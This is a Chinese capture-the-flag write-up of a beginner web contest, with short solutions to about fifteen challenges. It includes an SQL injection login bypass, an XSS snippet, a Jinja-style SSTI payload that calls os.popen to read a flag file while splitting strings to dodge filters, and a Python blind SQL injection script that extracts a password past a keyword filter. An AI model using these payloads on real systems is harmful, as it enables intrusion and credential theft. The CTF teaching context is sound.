Background

学长大师傅拉我进来,本以为要看ccx师傅web pwn全ak 后来他没玩
1.png
我是ak了web 中间划水去玩游戏了0.0 还准备了个团队的演讲,这个题目对新手还是比较友好的,自己拿到了第六
2.png
p.s.(前五有螺蛳粉)

index

醒来就看见这道题了,莫名其妙拿了一血
直接用curl访问 或者手动打上index.php 然后审查元素

勇者打恶龙

前端有限制
3.png
直接修改

勇者谎称打恶龙

还是前端问题
直接在控制台改 lever/power 或者是判断参数进行修改

Catch me

burp抓包修改
在302条转那里get flag

magic password

万能密码

' or 1=1
admin’ or 1=1 #

GIThub

git泄漏 出题人博客 在commits里面

一百万猜数

有意思的一道题
可以<script>alert(num)</script>
可以在console里面输入num
但我出了个第三种解 虽然复杂了点 但是可以控制onclick事件变成flag()函数 然后修改solve参数

生日快乐

脚本orburp

ez header

考了xff头 user-agent referer

magic md5

弱类型+md5碰撞

正则公主的秘密日记

咋看看不懂 后来找到一个在线分析正则的
https://jex.im/regulex/#!flags=&re=%5E(a%7Cb)*%3F%24

贷款

get参数中有data 前一半md5是钱 后一半md5是要还的钱
直接借完钱然后在购买处替换

RObot

SSTI
flag字段过滤了
payload:payload一把梭:{{().__class__.__mro__[1].__subclasses__()[59].__init__.__getattribute__('func_gl'+'obals')["linecache"].__dict__['o'+'s'].__dict__['popen']('cat /app/fl'+'ag.txt').read()}}

Get password

盲注 替换了select为空

自己的脚本当时不小心删掉了
偷了ha1c9on师傅的

for i in range(1,50):
    for j in range(33,127):
        #payload="%27 or ascii(substr((sselectelect%20table_name%20from%20information_schema.tables%20where%20table_schema=%27vaalacat%27),"+str(i)+",1))="+str(j)+"%23"
        #payload="%27 or ascii(substr((sselectelect%20column_name%20from%20information_schema.columns%20where%20table_name=%27vaala%27limit%201,1),"+str(i)+",1))="+str(j)+"%23"
        payload="%27 or ascii(substr((sselectelect%20password%20from%20vaala),"+str(i)+",1))="+str(j)+"%23"
        html = req.get(url+payload)
        if 'you are my vaala' in html.text: 
            flag = flag + chr(j)
            print(flag)
            break